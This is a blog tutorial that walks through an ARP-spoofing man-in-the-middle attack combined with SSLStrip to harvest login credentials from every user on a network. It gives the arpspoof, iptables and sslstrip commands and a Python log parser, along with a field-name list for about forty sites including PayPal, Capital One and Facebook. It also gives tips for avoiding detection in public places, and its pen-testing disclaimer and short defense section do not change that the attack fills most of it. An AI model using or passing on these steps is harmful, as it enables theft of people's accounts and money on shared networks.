Greetings, ladies and gentlemen. Today we'll be learning about a couple of interesting tools and how they can be used to steal data from network users. Specifically, we'll be going after login credentials to various secure sites, such as facebook and capital-one (the credit-card company).

NOTE: This tutorial is intended to instruct current and up-and-coming pen-testers on methods that can be used to determine security on specific networks which they have permission to attack. Executing this attack without permission is illegal, and I do not personally condone such behavior.

There is a video that tells you how this attack works, for those of you too impatient to sit and read, but this tutorial will include more specific information which the video does not reveal, as well as a script specifically written to make life simpler when executing this attack.

The video can be found here: Hak5 SSLStrip Tutorial

Go ahead, view the video. The rest of the class will wait here patiently until you return.


Did you watch it? Good. Now let's learn more about it.

In today's lesson we're going to need the following tools:
Each of these requirements might have other requirements of its own, however you can find ALL of these tools (and many more) preinstalled in the BackTrack Linux Distribution (see the link next to "A Linux OS" above).

So, if you don't have it yet, I highly suggest you go download BackTrack now. Yes, now. Go ahead.


Got it? Good.

Now, on to business.

What we're going to do today is perform a basic Man-In-The-Middle (MITM) attack on the users of our unsuspecting Target Network.

What is a Man-In-The-Middle attack?

I'm glad you asked. Here's a definition from our trusty friend, Wikipedia:

"In cryptography, a man-in-the-middle attack ... is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker."

In layman's terms, a MITM attack places the attacker between two unsuspecting targets, allowing him or her to intercept their communications.

So how does one perform one of these attacks?

Good question. There are many ways of performing man-in-the-middle attacks, especially on computer networks. Today we're going to focus on one called "ARP Spoofing" or "ARP Cache Poisoning."

To understand how this works, I'll give you a little bit of background.

ARP Spoofing takes advantage of vulnerabilities in the Address Resolution Protocol. This protocol (ARP) basically helps systems on a network determine what IPs are associated with what MAC addresses.

When a computer connects to a network, it needs certain information to allow it to get online. For example, it needs to know the IP of the gateway, where it will route all traffic. But knowing an IP is worthless unless you have a MAC address you can link it to. Without a MAC, an IP is simply a number, and systems won't know which interface or which system to communicate with.

So, for example, let's say you hook your computer to the local wifi. Here's what happens:

  1. Your computer will connect to the network, then will ask for the default gateway's MAC address via ARP. (Hi, I'm new here, who owns this place?)
  2. The router will see the ARP request, and send its MAC address. (Hey! I'm the router. Anything you need, you come to me first.)
  3. The computer will assign that MAC to the router's IP, and will continue on its merry way.

Thing is, systems don't just ask for the MAC once -- sometimes errors happen, sometimes routing tables change, so it is necessary to occasionally update the ARP tables to make sure they're up-to-date.

ARP Spoofing allows us to take advantage of this. Here's how that works:

  1. Your computer asks for the MAC for the gateway. (Hey, haven't seen router around, anyone know where he is? Just want to make sure he's still here.)
  2. The attacker will step in and claim to be the router. (Hi! I'm the new owner, you can talk to me.)
  3. Your computer will blindly accept this claim! (Oh, cool! Nice to meet you!)
  4. Meanwhile, when the real router shows up, the attacker's system will pretend to be your computer. (Hey! How's it going? So-and-so asked me to take his place, so if you don't mind, you can talk through me.)
  5. The router will also blindly accept this claim. (Cool, cool. Let him know I said hi!)

At this point, the attacker's computer has tricked the victim into thinking that it is actually the router, and has tricked the router into thinking it is the victim! So now, when the victim and router decide to talk, they end up speaking with you instead, allowing you to know everything they're saying (and change it up).

So how do I become the man-in-the-middle?

I'm getting to that! Be patient!

So in order to use ARP poisoning to become the MITM, you would need to perform the following steps:

  1. Set up port-forwarding on your Linux box.
    1. Code:
      echo '1' > /proc/sys/net/ipv4/ip_forward
    2. This tells your computer to forward any packets that weren't intended for your machine.
  2. Find out which system on your network is the gateway (e.g. router).
    1. Code:
      netstat -nr
    2. This will inform you about which IP belongs to the gateway. Usually it's something like
  3. Use ARP Spoof to put yourself between the router and all other systems on the network.
    1. Code:
      arpspoof -i wlan0
    2. You will need to change "wlan0" to reference whatever device is currently connected to the network -- usually eth0 or wlan0.
    3. You will need to change "" to the IP of the gateway through which your system connects. (See step 2.)
    4. If you watched the Hak5 video above, you'll notice that we didn't define a target via the "-t" option. In the Hak5 video, they were attacking a specific target. In THIS tutorial, we're attacking the entire network.
    5. NOTE: Under heavy loads, using arpspoof on an entire network can cause the network to crash, making the internet unavailable to all users. This makes it pretty obvious that something is up, and sysadmins will be doing what they can to fix the problem. Should this ever occur, stop the arpspoof process using 'ctrl-c' and wait a moment. The network should start working again, once the router informs everyone of its MAC. Then you can start your attack again, if you're so bold. (If you're worried about being caught, e.g. in a library or public place, just pretend like you're having trouble too and most people will ignore you.)
Having executed these steps, you will begin to see ARP Spoof actively rerouting all traffic through your system. You have now successfully become the Man in the Middle!

But how do I take advantage of this position?

Well, from this point, we can easily use tools like wireshark to sniff all network traffic and see what everyone's up to. Or we can reconfigure our firewall setup to deny access to specific IPs, effectively booting them off the network. Or we could use tools like the middler to actively change the traffic going through the network!

But we're not going to talk about those tools today -- that would be another tutorial altogether. Today we're going to learn how to use a fun tool called SSL Strip to steal login credentials from users.

What is SSL Strip?

SSL Strip is a tool written by Moxie Marlinspike and released at Black Hat DC 2009. It basically reroutes encrypted HTTPS requests from network users to plaintext HTTP requests, effectively sniffing all credentials passed along the network via SSL. The way it does this is it lets users connect via HTTP, logs their information, then redirects their connection to the originally-intended HTTPS server on the internet.

This all happens on the fly, and is practically invisible to users. The only way to notice is by checking the URL in the address bar: where normally it would display HTTPS, it will now display HTTP instead. (But on some sites, like Facebook, Myspace, and many others, the URL will never display HTTPS, so this attack will be impossible to detect by simply checking the URL.)

So how do we execute this attack?

Here's how:

  1. First things first -- we need to set up a firewall rule (via iptables) to redirect requests from port 80 to port 8080 -- this will ensure that our outgoing connections (from SSL Strip) get routed to the proper port.
    1. Code:
      iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
  2. Now that we've got our firewall setup, we need to execute the MITM instructions listed earlier.
    1. Code:
      echo '1' > /proc/sys/net/ipv4/ip_forward arpspoof -i wlan0
  3. Once arpspoof starts running, open a new terminal and start SSL Strip.
    1. Code:
      sslstrip -k -l 8080
    2. The "-k" designator tells the system to kill all currently active sessions, forcing users to re-login to their websites.
Now that we've started our MITM attack and got SSL Strip actively intercepting packets, all we have to do is sit and wait. SSL Strip will run as long as you want it to, and it will log all captured information in a file called sslstrip.log.

If you want to watch this file as it grows, you can use the 'tail' command. This is a fun tool that helps you watch logfiles as they're modified in real-time.

tail -f sslstrip.log
The "-f" modifier tells tail to follow the file until you tell it to stop.

Sweet! I've intercepted lots of traffic! Now what?

Once you're done with your attack, use the ctrl-c key combination to kill the 'tail,' 'sslstrip,' and 'arpspoof' processes. The sslstrip.log file will remain, and the system will stop being the MITM.

NOTE: As soon as the arpspoof process is ended, the network will go down temporarily. This is because arpspoof doesn't automatically repopulate ARP tables with the router's proper MAC, so systems are left in the dark until the router gets around to telling everyone its address. This problem shouldn't last long, but it happens to ALL systems on the network -- so it's best to play along (as if you're having trouble too). Immediately fleeing the premises is a pretty obvious clue that you had something to do with the outage.

After shutting down all processes and disconnecting from the network, you can safely go home and analyze the logfile you've made. It might look like a bunch of gobbledygook:

2010-06-27 20:38:24,482 SECURE POST Data (login.facebook.com): charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&locale=en_US&email=user%40email.com&pass=password&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&lsd=H2cF2
But if you look closely, you'll notice that the username and password used to log into the site are there, plain as day!

Of course, it's not easy parsing through huge files full of this kind of garbage, and often times we encounter sites we don't need to see.

What can we do about this problem?

Well lucky for you, I've already written a tool specifically to parse the sslstrip.log files! Here's the source code (it's in python):


#!/usr/bin/env python  
##################### # ParseLog.py # # By z3ros3c@gmail.com #####################  """ This file parses the sslstrip.log created by     sslstrip for usernames and passwords (and other     interesting information) defined in the file     resources/definitions.sslstrip. It will also     give you a complete list of all unknown information,     with the exception of anything listed in the file     resources/blacklist.sslstrip. """  from urllib import unquote  
getIP = lambda origin: origin[origin.find('(')+1:origin.find(')')]  blacklist = [] accounts = [] definitions = {}  def getDefs(defs):   d = {}   for definition in defs:     tmp = definition.split('|')     a = tmp.pop(0)     b = tmp.pop()     if('\n' in b):       b = b[:-1]     tmp.append(b)     d[a] = tmp[:]   return d  def getAllVars(line):   while('&&' in line):     line = line.replace('&&','&')   vars = {}   tmp = line.split('&')   for var in tmp:     try:       (a,b) = var.split('=')       if('$' in unquote(a)):         a = unquote(a).split('$').pop()       if('\n' in unquote(b)):         b = unquote(b)[:-1]       vars[unquote(a)] = unquote(b)     except:       pass   return vars  def process(origin,line):   origin = getIP(origin)   if(origin not in blacklist):     vars = getAllVars(line)     if(origin in definitions):       definition = definitions[origin][:]       name = definition.pop(0)       account = "(%s) " % name       for variable in definition:         try:           v = vars[variable]         except:           v = 'UNDEFINED'         account += "%s = %s :: " % (variable,v)       if('UNDEFINED' not in account):         if(account not in accounts):           accounts.append(account)           account += "**NEW**"         print(account)     else:       print("Unknown:\t%s" % origin)       for var in vars:         if(vars[var] != ""):           print("\t%s:\t%s" % (var,vars[var])) try:   lines = open('sslstrip.log','r').readlines() except:   lines = [] try:   blacklist = open('resources/blacklist.sslstrip','r').read().split('\n') except:   print("--blacklist not defined--") try:   accounts = open('accounts.txt','r').read().split('\n') except:   pass try:   definitions = getDefs(open('resources/definitions.sslstrip','r').readlines()) except:   pass  try:   line = lines.pop(0)   while(1):     while('POST' not in line):       try:         line = lines.pop(0)       except:         break     process(line,lines.pop(0))     try:       line = lines.pop(0)     except:       break except:   print("Empty logfile.")  output = open('accounts.txt','w') accounts.sort() for account in accounts:   if(account != ''):     output.write(account + '\n')
This script uses a definitions file and a blacklist file (named "definitions.sslstrip" and "blacklist.sslstrip" respectively) to weed out the information you need.

These files are stored in a subdirectory called "resources".

Here's what they look like:
Simply add each URL that you wish to ignore, and it'll prevent the script from parsing those URLs.

accounts.craigslist.org|CraigsList|inputEmailHandle|inputPassword digg.com|Digg|username|password en.wikipedia.org|Wikipedia|wpName|wpPassword en.wordpress.com|WordPress|log|pwd hi5.com|Hi5|email|password imgur.com|Imgur|username|password login.aeriagames.com|AeriaGames|edit[name]|edit[pass] login.capitalone.com|Capital One|user|password login.facebook.com|Facebook|email|pass login.live.com|Microsoft Live|login|passwd login.photobucket.com|PhotoBucket|loginForm[usernameemail]|loginForm[password] login.skype.com|Skype|username|password login.yahoo.com|Yahoo!|login|passwd my.screenname.aol.com|AIM|loginId|password my.t-mobile.com|T-Mobile|txtMSISDN|txtPassword mysprint.sprint.com|Sprint|USER|PASSWORD secure.imdb.com|IMDB|login|password secure.imvu.com|IMVU|avatarname|password secure.meetup.com|MeetUp|email|password secure.myspace.com|Myspace|Email_Textbox|Password_Textbox signin.ebay.com|Ebay|userid|pass slashdot.org|Slashdot|unickname|upasswd twitter.com|Twitter|session[username_or_email]|session[password] us.battle.net|BattleNet|accountName|password http://www.amazon.com/|Amazon|email|password http://www.blogger.com/|Blogger|Email|Passwd http://www.charter.com/|Charter.com|txtMyAcctV3UserName|txtMyAcctV3Pass|txtHorWideZipCodeV3 http://www.demonoid.com/|Demonoid|nickname|password http://www.deviantart.com/|DeviantArt|username|password http://www.formspring.me/|FormSpring|username|password http://www.friendster.com/|Friendster|email|password http://www.google.com/|Google|Email|Passwd http://www.linkedin.com/|LinkedIn|session_key|session_password http://www.mininova.org/|MiniNova|name|password http://www.netflix.com/|NetFlix|email|password1 http://www.paypal.com/|PayPal|login_email|login_password http://www.progressive.com/|Progressive|user1|PWDpassword1 http://www.reddit.com/|Reddit|user|passwd http://www.stumbleupon.com/|StumbleUpon|username|password
As you can see, each definition is listed in the following manner:

URL|Name Of Site|username_variable|password_variable|other_variables
It's relatively easy to add new definitions as you discover them!

Once you've got these files set up, all you have to do is put the sslstrip.log file in the same directory as the parselog.py script, then run it.

parselog.py | less
(I pipe the output to the 'less' so that I can parse the resulting output easier.)

You'll see output similar to the following:

(Facebook) email = user@email.com :: pass = password :: **NEW**
The script will print all discovered logins (marking new logins as **NEW**) as well as all unknown URLs found. These unknown URLs can be used to help you define new entries for the 'definitions.sslstrip' list.

All accounts found will be added to a file called 'accounts.txt' for your viewing pleasure, arranged alphabetically by the website they belong to.

And that's that!

What can I do to prevent this attack from hurting me?

There's not a whole lot you can do, though there are some defenses outlined here.

My suggestion is this: If you're ever on a public network, or if your personal wifi is unsecured, don't use that network to log into any of your personal accounts, unless you've got another defense in place.

One fun trick is to use SSH tunneling to route your traffic. If you've got an account on a secure box out in the internet somewhere (for example, a linux system hosted on the cloud), you can create a SSH tunnel to that box and route your traffic through the tunnel. That way, no matter who is listening in on your connection, all traffic is encrypted and there's little they can do to intercept it.

Of course, SSH tunneling is a different tutorial for a different day.

Well, class, I hope this tutorial has been informational and fun for all involved! Take care, and happy hacking!

Post a Comment Blogger